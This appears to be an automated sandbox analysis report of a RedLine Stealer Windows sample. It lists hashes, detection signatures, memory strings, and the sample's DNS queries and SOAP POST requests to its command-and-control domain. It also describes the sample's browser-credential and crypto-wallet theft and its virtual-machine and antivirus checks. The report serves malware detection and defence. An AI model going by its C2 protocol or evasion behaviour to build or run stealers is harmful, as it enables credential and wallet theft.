Loading ...

Play interactive tourEdit tour

Windows Analysis Report 7d9bXpW0im.exe

Overview

General Information

Sample Name:7d9bXpW0im.exe
Analysis ID:458956
MD5:0f838cf9ac70e706ab24f4555618186c
SHA1:01ab9926ff27f0d253d63fe34c743bbbab05ee8f
SHA256:b1445b8206b5f2f15cd8d9a7bb8e0b551491ed72cb07ccb5f2a1f877b084396c
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Yara detected RedLine Stealer
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 7d9bXpW0im.exe (PID: 3440 cmdline: 'C:\Users\user\Desktop\7d9bXpW0im.exe' MD5: 0F838CF9AC70E706AB24F4555618186C)
    • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      Process Memory Space: 7d9bXpW0im.exe PID: 3440JoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Process Memory Space: 7d9bXpW0im.exe PID: 3440JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.7d9bXpW0im.exe.9d70000.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: 7d9bXpW0im.exeVirustotal: Detection: 30%Perma Link
            Source: 7d9bXpW0im.exeMetadefender: Detection: 25%Perma Link
            Source: 7d9bXpW0im.exeReversingLabs: Detection: 53%
            Machine Learning detection for sampleShow sources
            Source: 7d9bXpW0im.exeJoe Sandbox ML: detected
            Source: 7d9bXpW0im.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 7d9bXpW0im.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

            Networking:

            barindex
            Performs DNS queries to domains with low reputationShow sources
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeDNS query: victairatu.xyz
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeDNS query: victairatu.xyz
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeDNS query: victairatu.xyz
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: victairatu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: victairatu.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: victairatu.xyzContent-Length: 12087Expect: 100-continueAccept-Encoding: gzip, deflate
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: victairatu.xyzContent-Length: 12079Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: NANO-ASLV NANO-ASLV
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: victairatu.xyz
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: victairatu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: 7d9bXpW0im.exe, 00000001.00000002.257942560.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
            Source: 7d9bXpW0im.exe, 00000001.00000002.257668290.0000000002370000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: 7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultx)4
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://service.r
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://support.a
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
            Source: 7d9bXpW0im.exe, 00000001.00000002.257668290.0000000002370000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
            Source: 7d9bXpW0im.exe, 00000001.00000002.258017733.000000000257C000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000002.257698432.000000000239F000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
            Source: 7d9bXpW0im.exe, 00000001.00000002.257942560.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
            Source: 7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/t_
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://victairatu.xyz
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://victairatu.xyz/
            Source: 7d9bXpW0im.exe, 00000001.00000002.257942560.00000000024E1000.00000004.00000001.sdmpString found in binary or memory: http://victairatu.xyz4
            Source: 7d9bXpW0im.exe, 00000001.00000002.258017733.000000000257C000.00000004.00000001.sdmpString found in binary or memory: http://victairatu.xyz4/l
            Source: 7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpString found in binary or memory: http://victairatu.xyz:80/
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
            Source: 7d9bXpW0im.exe, 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
            Source: 7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb4/l
            Source: 7d9bXpW0im.exe, 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000003.250811151.000000000E791000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 7d9bXpW0im.exe, 00000001.00000003.250811151.000000000E791000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabp
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000003.250811151.000000000E791000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
            Source: 7d9bXpW0im.exe, 00000001.00000002.261102430.0000000009D70000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
            Source: 7d9bXpW0im.exe, 00000001.00000002.257731627.00000000023B7000.00000004.00000001.sdmp, 7d9bXpW0im.exe, 00000001.00000002.257721673.00000000023B3000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
            Source: 7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
            Source: 7d9bXpW0im.exe, 00000001.00000002.257227486.00000000006BF000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: 7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            System Summary:

            barindex
            PE file contains section with special charsShow sources
            Source: 7d9bXpW0im.exeStatic PE information: section name: vMF<;
            PE file has nameless sectionsShow sources
            Source: 7d9bXpW0im.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009028A8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009018D1
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00907074
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090B350
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009064A8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009024E1
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090A418
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00907C40
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090BD00
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00902898
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009090B9
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009030A0
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009020DB
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009090C8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090B00F
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090B073
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009031B0
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090B1A3
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090D9E8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090B11C
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090BA98
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090BA89
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009022D5
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00902202
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00901B99
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009063B1
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00907BA4
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00901BA8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009023C4
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009063C7
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00905CD6
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00905C58
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00908C68
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009085B8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009025BA
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090ADA6
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_009025F2
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090ADFE
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00902514
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AD21
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AD70
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AED6
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AE1D
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AE65
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_00901F80
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090CFC8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AFC8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AF07
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0090AF36
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043B44C8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043B5F40
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043B8FA0
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043B72F8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043B42F8
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043B72F7
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_043BF387
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0D2ED288
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeCode function: 1_2_0D2EC990
            Source: 7d9bXpW0im.exeBinary or memory string: OriginalFilename vs 7d9bXpW0im.exe
            Source: 7d9bXpW0im.exe, 00000001.00000002.256828602.00000000000C6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVentails.exe4 vs 7d9bXpW0im.exe
            Source: 7d9bXpW0im.exe, 00000001.00000002.261153779.0000000009DB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 7d9bXpW0im.exe
            Source: 7d9bXpW0im.exeBinary or memory string: OriginalFilenameVentails.exe4 vs 7d9bXpW0im.exe
            Source: 7d9bXpW0im.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 7d9bXpW0im.exeStatic PE information: Section: vMF<; ZLIB complexity 1.0003504136
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/21@5/1
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB150.tmpJump to behavior
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: 7d9bXpW0im.exeVirustotal: Detection: 30%
            Source: 7d9bXpW0im.exeMetadefender: Detection: 25%
            Source: 7d9bXpW0im.exeReversingLabs: Detection: 53%
            Source: unknownProcess created: C:\Users\user\Desktop\7d9bXpW0im.exe 'C:\Users\user\Desktop\7d9bXpW0im.exe'
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: 7d9bXpW0im.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 7d9bXpW0im.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\7d9bXpW0im.exeUnpacked PE file: 1.2.7d9bXpW0im.exe.90000.0.unpack vMF<;:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
            Source: 7d9bXpW0im.exeStatic PE information: section name: vMF<;
            Source: 7d9bXpW0im.exeStatic PE information: section name:
